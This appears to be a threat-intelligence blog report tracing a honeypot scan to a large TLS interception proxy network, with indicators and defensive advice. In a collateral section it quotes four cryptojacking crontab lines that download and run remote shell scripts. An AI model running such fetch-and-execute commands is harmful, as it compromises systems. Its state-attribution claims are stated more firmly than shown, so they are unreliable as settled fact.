>_|
BreakglassIntelligence
< Back to blog
critical๐ŸŽฏAPT
investigatedMarch 7, 2026publishedMarch 7, 2026

From Honeypot Hit to Russian State MITM: How a Single PostgreSQL Scan Led Us to a 128,000-IP Surveillance Empire

Threat Actors:NEKOBYTEBucklog```Confidenceand takedown efforts.could:** WatchDog group (suspected overlap/rivalry with TeamTNT)Markermarker**. This was identified by:ProfileAssessment** who:
#phishing#asyncrat#cobalt-strike#nekobyte#smokeloader#lumma#bucklog#c2#ransomware#supply-chain

Published: 2026-03-08 | TLP:WHITE | Breakglass Intelligence

TL;DR

A routine 13-event PostgreSQL credential stuffing attempt against our honeypot from a NEKOBYTE INTERNATIONAL LIMITED IP (212.113.98.30) unraveled into one of the largest documented Man-in-the-Middle (MITM) interception operations in recent memory: 300+ proxy hosts serving 56 stolen TLS certificates for Apple, Google, GitHub, Microsoft, Amazon, WhatsApp, and dozens more, backed by 22 autonomous systems spanning 128,000+ IPv4 addresses, 13+ UK shell companies directed by teenage Russian/Belarusian/Ukrainian nominees, and definitive links to the Russian state surveillance apparatus (TSPU/SORM) via a Russian Government "Trusted Sub CA" certificate and VK-issued internal CA certificates with 30-year validity.

The Starting Point: 6 Hours, 4,564 Events, 99 IPs

On March 7, 2026, our DigitalOcean honeypot at 68.183.52.163 (NYC3) ingested 4,564 events from 99 unique source IPs over a 6-hour window. The automated triage pipeline scored the usual suspects: an env-harvesting Kubernetes cluster (Bucklog SARL, 3,171 requests), Bulgarian scanner infrastructure (4vendeta.com), a trio of Azure VMs hunting for pre-existing webshells, and assorted credential stuffers.

One IP scored a modest 25/100. It fired 13 PostgreSQL authentication attempts over 31 seconds, trying postgres with blank and "empty" passwords. Routine. Unremarkable. But its reverse DNS told a different story:

212.113.98.30 โ†’ vm36904.it-garage.network

The rDNS pointed to a hosting brand. The WHOIS pointed to NEKOBYTE INTERNATIONAL LIMITED, a UK company created December 16, 2025 -- barely 11 weeks old. The ASN, AS206134, began announcing prefixes on February 21, 2026 -- just two weeks before the scan hit our honeypot.

Brand-new ASN. Brand-new company. Russian infrastructure scanning PostgreSQL databases. We pulled the thread.

The MITM Infrastructure: Industrial-Scale Certificate Theft

Discovery Methodology

Standard port scanning (nmap, masscan) of NEKOBYTE's IP space returned almost nothing on port 443. The proxies employ SNI-based stealth activation: they only respond when the TLS Client Hello includes a Server Name Indication header matching a targeted domain. Without SNI, port 443 appears closed. This makes the infrastructure invisible to conventional scanning.

We probed with domain-specific SNI headers across NEKOBYTE's 23 announced prefixes. The results were staggering.

What We Found

Over 300 IP addresses across 20 of NEKOBYTE's 23 prefixes are running transparent TLS reverse proxies. Each proxy serves a valid, production TLS certificate for a major internet service -- not a self-signed forgery, but the genuine certificate with the genuine private key, verified against Certificate Transparency logs.

The proxies accept connections from victims whose traffic has been redirected (via DNS poisoning, BGP hijacking, or ISP-level TSPU/SORM equipment), present the real certificate, decrypt and inspect the traffic, then re-encrypt and forward it to the legitimate service. From the victim's perspective, everything looks normal. The padlock is green. The certificate is valid.

Confirmed Active Proxying

On 212.113.98.7:8443 and 212.113.98.12:8443, the Yandex MITM proxies return real Yandex response headers:

x-yandex-req-id: 1772899971184033-17249884045371771892-balancer-l7leveler-kubr-yp-sas-194-BAL

They set real Yandex cookies (_yasc, bh). The responses are HTTP 406, consistent with Yandex's actual server behavior for requests missing required parameters. This proves traffic transits through these proxies to real Yandex infrastructure while being intercepted in transit.

On the GitHub MITM nodes (212.113.98.100, 147.45.210.100), the proxies serve the complete GitHub login page with working CSRF tokens (authenticity_token), real session cookies (_gh_sess, _octo, logged_in), and functional git-upload-pack protocol (confirmed by fetching torvalds/linux refs). The GitHub DV certificate -- serial 1DC289C1EADAFB04E9D1CF53D5D72253 -- was issued by Sectigo on March 6, 2026, one day before our scan. The operation is actively acquiring new certificates.

Certificate Inventory: 56 Stolen Certificates Across the Global Internet

Extended Validation (EV) Certificates -- Highest Severity

EV certificates require extensive legal entity verification, including corporate document validation. These cannot be obtained through simple domain control verification.

TargetCertificate SerialIssuerHosts
www.icloud.com77B7A9C8C7061FD5534F327C4A267713Apple Public EV Server RSA CA 1 - G13+
www.apple.com0A22ACE42FC71F463F953EF0B5A83F0CApple Public EV Server RSA CA 1 - G13+
images.apple.com51B33882D6DA285928E81E8AB9C7AAAAApple Public EV Server ECC CA 1 - G11+
itunes.apple.com02C1C6D6D8EA849BAC63B8F3BD164E91Apple Public EV Server RSA CA 1 - G11+
store.steampowered.com602290773 (Valve Corp)DigiCert Global G3 TLS ECC SHA3841+

Organization-Validated (OV) and Domain-Validated (DV) Certificates

TargetIssuerMITM HostsCategory
*.google-analytics.comGoogle Trust Services WR2230+Mass interception
*.google.comGoogle Trust Services WR2100+Search/services
github.comSectigo DV E3626+Developer platform
www.microsoft.comMicrosoft TLS G2 RSA CA OCSP 044+Enterprise
www.amazon.comAmazon RSA 2048 M044+E-commerce
*.yandex.tr (+49 domains)GlobalSign ECC OV 201812+Russian search
*.vk.com (+28 domains)GlobalSign ECC OV 201810+Russian social media
*.tesla.comGeoTrust TLS RSA CA G13+Automotive
*.intel.comSectigo Public Server Auth CA OV E361+Semiconductors
*.reddit.comDigiCert Global G2 TLS RSA SHA2561+Social media
*.wikipedia.orgLet's Encrypt E82+Knowledge
www.zdf.deDigiCert Global G2 TLS RSA SHA2561+German national TV
*.telegram.orgGoDaddy1+Messaging
cloudflare-dns.comSSL.com ECC R21+DNS security

The Google Analytics certificate is the most widespread, deployed across 230+ hosts. Because Google Analytics tracking beacons are loaded by millions of websites, intercepting *.google-analytics.com provides passive traffic collection from every GA-enabled site visited by a target. This is mass surveillance infrastructure.

Certificate Verification Against CT Logs

The github.com certificate served on NEKOBYTE proxies was verified against Certificate Transparency logs at crt.sh (IDs 24809178038, 24809177625). The serial number and SHA1 fingerprint are identical to the certificate served by the real github.com. These are not forged certificates -- they are the genuine certificates with genuine private keys. This is only possible through state-level access to certificate private keys, compromise of organizational PKI infrastructure, or compromise of Certificate Authorities.

The Russian State Smoking Gun: TBank and VK Internal CA

Russian Government "Trusted Sub CA" Certificate

One host serves a TLS certificate for *.t-bank-app.ru issued by the "Russian Trusted Sub CA" -- a certificate authority operated by the Russian government under the TSPU (Technical Means for Countering Threats) program. This is not a public CA that issues certificates to anyone who requests them. This is a state-operated CA, and its presence on this infrastructure definitively links the operation to the Russian state.

VK Internal CA -- 30-Year Purpose-Built Surveillance Certificate

Multiple hosts (138.124.241.37, .45, .76, 144.31.251.21, 138.124.231.2:8443) serve VK certificates issued not by a public CA, but by VK's own private intermediate CA:

issuer:   C=RU, L=Saint Petersburg, O=VK, CN=VK interm CA
validity: Jul 13, 2022 -- Aug 24, 2052 (30-YEAR CERT)
serial:   724791A0BB85EA47683BF75D06F47791E0571781

This is not a stolen public certificate. A 30-year validity period is incompatible with any public CA policy. This is a purpose-built internal certificate for TLS interception, proving VK cooperates with the surveillance operation, almost certainly under SORM (System for Operative Investigative Activities) legal requirements that compel Russian service providers to enable lawful interception capabilities.

WhatsApp Interception Proxy

At 144.31.98.33, an unauthenticated HAProxy stats page (port 9200) reveals a TCP-level WhatsApp interception proxy:

ComponentBackend TargetConnectionsData Volume
haproxy_v4_whatsapp_netwhatsapp.net:44362,25412.3 MB in / 686.3 MB out
wa (XMPP)g.whatsapp.net:52227,46610.4 MB in / 92.7 MB out

The proxy has been running for approximately 15.5 days (since ~February 20, 2026) and has handled 62,254 TLS connections and 7,466 XMPP connections to WhatsApp servers, moving 686 MB of outbound data.

Network Topology: 22 ASNs, 128,000 IPs, One Operator

The Corporate Shell Game

Tracing RIPE database objects, DNS records, UK Companies House filings, and billing portal hostnames, we mapped a three-tier network:

TIER 0 -- UPSTREAM TRANSIT
  aurologic GmbH (AS30823, Frankfurt) -- DDOS-GUARD -- Hurricane Electric
       |
TIER 1 -- CORE BACKBONE
  AS49418  NETSHIELD LTD -- transit hub, 7 IXPs
  AS198981 NETSHIELD-BYOIP -- secondary
       |
TIER 2 -- OPERATIONAL ENTITIES (all transit via AS49418)
  +-- AS206134  NEKOBYTE INTERNATIONAL -- MITM proxy infrastructure
  +-- AS213887  WAIcore Ltd -- largest IP holder (16,896 IPv4)
  +-- AS216127  NUXTCLOUD / Int'l Hosting Co -- 15,360 IPv4
  +-- AS215590  DpkgSoft/XORA -- 21,796 IPv4
  +-- AS212701  Hostinux -- hosting brand
  +-- AS200823  MHost LLC -- Georgian front
  +-- AS210546  CHSL ONE -- hosting brand
  +-- [7 more ASNs]

Proof of Unified Control

Six nominally separate domains -- it-garage.pro, waicore.com, mhost.ee, netshield.ltd, altawk.com, hostinux.com -- all converge on a single NETSHIELD IP: 64.188.114.188 (hostname: web.netshield.uk). The MHost billing portal (my.mhost.ee) resolves to breaking-bad-bm.waicore.network. A single RIPE IP block (62.60.252.0/24) has five different maintainers from five "separate" entities. The same RIPE admin handle (AA44942-RIPE) appears on NEKOBYTE, NUXTCLOUD, and IT-GARAGE objects.

The Teenage Director Pattern

All 13+ UK shell companies use three London virtual office addresses (71-75 Shelton Street, 128 City Road, 27 Old Gloucester Street) and are directed by Russian, Belarusian, and Ukrainian nationals aged 18-22 at appointment:

CompanyDirectorDOBNationalityAge at Appointment
NEKOBYTE INTERNATIONALSergei SatsukevichApr 2005Russian20
NETSHIELD LTDAleksei DiabinJan 2005Russian19
WAIcore LtdAliaksei BolbasFeb 2004Belarusian20
PARTNER HOSTINGDenys HnoievyiAug 2005Ukrainian18
DPKGSOFT INTERNATIONALAleksei DiabinJan 2005Russian19

NETSHIELD has cycled through three directors in three years, each younger than the last. Companies are incorporated, used for RIPE allocations, dissolved, and replaced with successors -- NEKOBYTE LIMITED (created June 2025, dissolved January 2026) was replaced by NEKOBYTE INTERNATIONAL LIMITED (created December 2025) with a one-month overlap.

The actual network engineering is performed by Dan Fedoseev (dan.fedoseev.20@gmail.com), who controls DGTLS-MNT and MNT-DGTL (250+ RIPE objects combined) but never appears as a director of any UK company. He stays behind the RIPE infrastructure layer while nominee directors absorb legal liability.

Threat Intelligence Crosslinks

Doppelganger Disinformation Campaign

Documented by Intrinsec (April 2025) and Qurium Media Foundation (July 2024), Partner Hosting LTD and WAIcore IPs hosted front domains in the Russian state-linked Doppelganger disinformation campaign targeting Western democracies. aurologic GmbH provided upstream transit. When Qurium reported NETSHIELD's AS198981 to aurologic CEO Joseph Maximilian Hofmann, he blocked the researchers on X rather than acting.

Redline Stealer C2

Acronis documented a Redline Stealer C2 server (82.115.223.190) registered under "Flameochka Servers" with the registrar email lir@wai.ac -- a WAIcore domain.

Marshall Servers -- Bulletproof Hosting on Russian Cybercrime Forums

User "Flameochka" operates Marshall Servers on the WAIcore/NETSHIELD network, advertised on lolz.live and FB-Killa (major Russian cybercrime forums). The same infrastructure hosts Altawk Hosting (altawk.com), another bulletproof hosting brand accepting cryptocurrency payments.

Recorded Future Assessment

Recorded Future classifies WAIcore, Netshield, DpkgSoft, and Partner Hosting as "Threat Activity Enablers." The upstream provider aurologic GmbH was the subject of Recorded Future's report "Malicious Infrastructure Finds Stability with aurologic GmbH" and is ranked in the top-10 for malicious activity density.

Collateral Findings: Fraud and Malware Co-Hosted

The MITM surveillance infrastructure shares hosting with active fraud operations:

  • Van Gogh Museum ticket scam (vangoghmuseum.sale, MHOST AS200823): HTTrack clone of the real museum site, actively buying Google Ads (AW-17048113350) to drive victim traffic. SSL issued March 3, 2026.
  • Clonedshop.net crypto scam: Full checkout flow accepting 6 cryptocurrencies with Telegram-based exfiltration (bot token 8473425222:AAG..., chat 7375062113).
  • Fake ByBit exchange (95.85.236.27:8080, MHOST): Cyrillic character substitution ("ByBit" rendered as "ะ’ัƒะ’it"), Java/Spring Boot backend with admin panel and live chat.
  • Miller Drainer (147.45.218.10, HOSTINUX): Drainer-as-a-Service panel targeting ETH, BSC, Polygon, and Arbitrum chains.
  • alantra-markets.com (77.239.127.64, NEKOBYTE): Russian-language fake trading platform directly on NEKOBYTE MITM infrastructure.
  • ScreenConnect RAT delivery via indictmentportal.online (77.91.70.57, CHSL-ONE).

WatchDog Cryptojacking on NEKOBYTE

At 212.113.98.33, an unauthenticated Redis 8.4.0 instance contains four crontab injection payloads for the WatchDog cryptojacking group (active since January 2019):

*/2 * * * * root cd1 http://b.clu-e.eu/b2f628/b.sh
*/3 * * * * root wget -q -O- http://b.clu-e.eu/b2f628/b.sh
*/4 * * * * root curl http://b.clu-e.eu/b2f628/b.sh
@hourly python -c "import urllib2; print urllib2.urlopen('http://b.clu-e.eu/t.sh').read()" >.1;chmod +x .1;./.1

The /b2f628/ directory is a confirmed WatchDog attribution marker (Unit42, Cado Security, Securonix). The NEKOBYTE server is a victim, not the operator -- its exposed Redis was compromised by the worm, having received 286,365 connections in 16 days.

The Upstream Enabler: aurologic GmbH (AS30823)

All NEKOBYTE/NETSHIELD traffic transits through aurologic GmbH in Frankfurt, operated by CEO Joseph Maximilian Hofmann from Robert-Bosch-Str. 25, 63225 Langen, Germany.

aurologic is not a negligent transit provider. It was created by renaming combahton GmbH (itself a known abuse-friendly provider). It continues to provide transit for OFAC-sanctioned Aeza International (AS210644 -- BianLian ransomware, Lumma, RedLine, FSB-arrested co-founders). Its 37 downstream ASNs host 30+ malware families including BianLian, Lumma, Meduza, RedLine, Rhadamanthys, AsyncRAT, REMCOS, Cobalt Strike, Sliver, SmokeLoader, and DDoSia.

When confronted by German journalists (CORRECTIV), CEO Hofmann stated: "I can kick everyone out, but then at some point I won't make any sales."

MITRE ATT&CK Mapping

TechniqueIDApplication
Adversary-in-the-MiddleT1557TLS interception with stolen/compelled certificates
Network SniffingT1040Passive traffic capture through MITM proxies
Steal Web Session CookieT1539VK/Yandex/Google cookie interception (confirmed live)
Data from Cloud StorageT1530iCloud data interception via Apple EV cert
Email CollectionT1114mail.ru MITM proxy
Credentials from Password StoresT1555Browser credential interception via transparent proxy
Supply Chain CompromiseT1195Compromise of certificate infrastructure / compelled key disclosure
ProxyT1090Transparent TLS reverse proxy infrastructure
Domain FrontingT1090.004SNI-based stealth activation (invisible to standard scanning)
Acquire InfrastructureT1583.003Bulletproof VPS via shell company network
Digital CertificatesT1587.003Fraudulent/compelled TLS certificates
Scheduled Task/Job: CronT1053.003WatchDog Redis crontab injection (collateral finding)

Defensive Recommendations

Immediate Actions

  1. Certificate Transparency monitoring. Set up CT log alerts for any certificate issuance to your organization's domains. The NEKOBYTE operation is actively acquiring new certificates -- the Intel cert was issued March 4, 2026 (3 days before detection), and the GitHub cert was issued March 6 (1 day before).

  2. Block AS206134 (NEKOBYTE) and AS49418 (NETSHIELD) at your perimeter. Block the full list of prefixes in the IOC tables below. If your firewall supports ASN-based blocking, block all 22 related ASNs.

  3. Certificate pinning. For critical internal services that access Apple, Google, Microsoft, or GitHub APIs, implement certificate pinning or at minimum monitor for unexpected certificate changes.

  4. HAProxy stats exposure. The WhatsApp MITM proxy at 144.31.98.33:9200 has unauthenticated HAProxy stats. If you operate HAProxy, ensure your stats pages require authentication and are not exposed to the internet.

Detection Rules

  1. SNI mismatch detection. Monitor for TLS connections where the SNI hostname resolves to a NEKOBYTE IP range rather than the legitimate service's IP. This is the primary indicator that traffic is being redirected through the MITM infrastructure.

  2. Certificate serial monitoring. Compare TLS certificate serials observed in your network against the IOC list below. If you see any of these serials served from an IP outside the legitimate service's infrastructure, you have a MITM condition.

  3. Google Analytics interception detection. Monitor DNS responses for *.google-analytics.com resolving to non-Google IP ranges. With 230+ MITM hosts, this is the most widespread interception vector.

Organizational Actions

  1. Report to affected CAs. DigiCert (Apple, AMD, Oracle, Yahoo, Reddit, Pinterest), GlobalSign (Yandex, VK, Ozon, Avito), Sectigo (GitHub, Intel), Google Trust Services (Google Analytics, Google.com), and Microsoft should receive certificate revocation requests with the serials and NEKOBYTE IPs as evidence.

  2. RIPE NCC abuse report for AS206134, AS49418, and associated ASNs. Request review of all ACE Data Centers sub-allocations.

  3. UK NCA referral. All shell companies are UK-registered. The pattern of teenage nominee directors, systematic company rotation, and virtual office addresses warrants investigation.

Indicators of Compromise

Network Prefixes -- MITM Confirmed

PrefixASNEntity
212.113.98.0/24AS206134NEKOBYTE
212.113.99.0/24AS206134NEKOBYTE
144.31.98.0/24AS206134NEKOBYTE
144.31.181.0/24AS206134NEKOBYTE
144.31.182.0/24AS206134NEKOBYTE
144.31.188.0/24AS206134NEKOBYTE
144.31.251.0/24AS206134NEKOBYTE
144.31.132.0/24AS210546CHSL-ONE
138.124.240.0/24AS206134NEKOBYTE
138.124.241.0/24AS206134NEKOBYTE
147.45.210.0/24AS206134NEKOBYTE
178.236.240.0/24AS206134NEKOBYTE
178.236.243.0/24AS206134NEKOBYTE
195.62.48.0/23AS206134NEKOBYTE
64.188.115.0/24AS206134NEKOBYTE
77.91.70.0/24AS210546CHSL-ONE
77.91.79.0/24AS206134NEKOBYTE
77.239.125.0/24AS206134NEKOBYTE
77.239.126.0/24AS206134NEKOBYTE
77.239.127.0/24AS206134NEKOBYTE
45.131.214.0/24AS200823MHOST
95.85.236.0/24AS200823MHOST
138.124.231.0/24AS212701HOSTINUX
147.45.218.0/24AS212701HOSTINUX

Key Infrastructure IPs

IPRole
144.31.98.33WhatsApp MITM proxy (HAProxy stats on :9200)
212.113.98.7Active Yandex MITM proxy (:8443)
212.113.98.12Active Yandex MITM proxy (:8443)
212.113.98.25Active VK.com MITM proxy
212.113.98.100GitHub MITM proxy (DynDNS: saintjueves.strangled.net)
147.45.210.100GitHub MITM proxy (rDNS: vm23588.it-garage.network)
212.113.98.139Apple iCloud MITM proxy
212.113.98.33Compromised Redis (WatchDog victim)
64.188.114.188NETSHIELD web infrastructure (6 domains converge here)

Certificate Serials (for CT log monitoring and revocation)

TargetSerial
github.com1DC289C1EADAFB04E9D1CF53D5D72253
*.google-analytics.com5E5763F5526E8B620ACB826C673569E6
*.google.comCC025CEB2451A2AD0ABB644A397D1106
www.icloud.com77B7A9C8C7061FD5534F327C4A267713
www.apple.com0A22ACE42FC71F463F953EF0B5A83F0C
images.apple.com51B33882D6DA285928E81E8AB9C7AAAA
itunes.apple.com02C1C6D6D8EA849BAC63B8F3BD164E91
www.microsoft.com43000253929E1C999055F04653000000025392
*.yandex.tr7F55445E56EBD6821B0F565F
*.intel.com76835B6F9FD062D65AAEB8DC9CB8F000
*.tesla.com0F2E92ADC36EC53625D660EC774BEC67
*.www.yahoo.com03F523F3F8ECE84CC3B6C916173D4CFE
cloudflare-dns.com4ED03304C46B87A8C2EB5569DB9EBA0C
*.t-bank-app.ru019648D22826DAB4347F1C36097F
www.zdf.de024F850BB0C90D719A3EE12C01F4C6AB
*.wikipedia.org0666163CC3790D2D917D56A0DD1C87974320
VK Internal CA724791A0BB85EA47683BF75D06F47791E0571781

Autonomous Systems

ASNEntityRole
AS206134NEKOBYTEMITM proxy infrastructure
AS49418NETSHIELDTransit backbone
AS213887WAIcoreLargest IP holder (16,896 IPv4)
AS216127NUXTCLOUDHosting
AS215590DpkgSoft/XORAHosting
AS200823MHostGeorgian front
AS212701HostinuxHosting
AS210546CHSL ONEHosting
AS205719FORESTSNETNewest entity
AS30823aurologic GmbHUpstream transit enabler

Fraud/Phishing Domains

DomainTypeInfrastructure
vangoghmuseum.saleMuseum ticket scam45.131.214.92, MHOST
clonedshop.netCrypto scam storefrontCloudflare-fronted
paypal-mail.dePayPal phishing95.85.236.1, MHOST
order-littleceasars.onlineLittle Caesars phishing45.131.214.3-4, MHOST
panel.catmofaka.onlineNestJS C2 panel138.124.231.1, HOSTINUX
indictmentportal.onlineScreenConnect RAT delivery77.91.70.57, CHSL-ONE
alantra-markets.comFake trading platform77.239.127.64, NEKOBYTE
alldata.suFake NextCloud harvester144.31.132.225, CHSL-ONE

Crypto Wallet Addresses (clonedshop.net)

ChainAddress
ETH0xc59Fc1606d1e8889160334667fb6bedb61954Fd9
BNB0x683eBfe6E232c2f53198B57E9EF2e2F37b0BC437
BTCbc1qp4agcfegz7tc6f96jxnccvfxk3uzqex95tv636
SOL3Ja5g9mn2Kgs5HbEVgriNuvJeNmqHydxHbyLaSMrVirY
LTCltc1q4qmunuqh7jeghvr5f25pn46dzzj6lxknxzu3s9
TRONTJdvkBg2YyzCSpraZ3PfQZAwS2pWBVebSx

Conclusion

A 13-event PostgreSQL scan -- scored 25 out of 100 by our automated triage -- led to the discovery of an infrastructure that appears designed for state-level surveillance at internet scale. The combination of genuine TLS certificates (verified against CT logs), a Russian Government "Trusted Sub CA" certificate for TBank, VK-issued internal CA certificates with 30-year validity, and an active WhatsApp interception proxy with 62,000+ connections paints a picture consistent with Russia's TSPU/SORM lawful interception apparatus, deployed on bulletproof hosting infrastructure that simultaneously supports cybercrime operations, disinformation campaigns, and commercial hosting sold on Russian underground forums.

The infrastructure serves triple purposes: state surveillance (MITM interception of Russian domestic services and foreign targets), commercial bulletproof hosting (Marshall Servers, Altawk, IT-Garage -- all advertised on lolz.live), and active fraud (museum ticket scams, crypto drainers, phishing, wallet drainers). This co-location of state and criminal infrastructure on the same network, behind the same UK shell companies directed by the same pool of teenage nominees, suggests either deliberate symbiosis or willful blindness at the operational level.

The operation was invisible to standard scanning techniques. Without SNI-targeted probing, these 300+ MITM proxies would appear as inactive hosts with closed port 443. The certificates are valid. The proxies forward traffic transparently. The only detection vector is monitoring for certificate delivery from unexpected IP ranges -- and the operation is actively acquiring fresh certificates, with the Intel cert issued three days before detection and the GitHub cert issued one day before.

The remaining 400+ unscanned prefixes across NUXTCLOUD, U1HOST, SERVHOST, WAICORE, XORA, and NEONCORE likely contain hundreds more MITM proxies. What we documented is almost certainly a fraction of the total operation.

All data collection was passive or used publicly accessible APIs and known vulnerabilities (CVE-2021-26086 on a NEKOBYTE JIRA instance). No unauthorized access was performed.

Breakglass Intelligence provides threat intelligence research and analysis. For questions about this report, contact intel@breakglass.tech.

Share: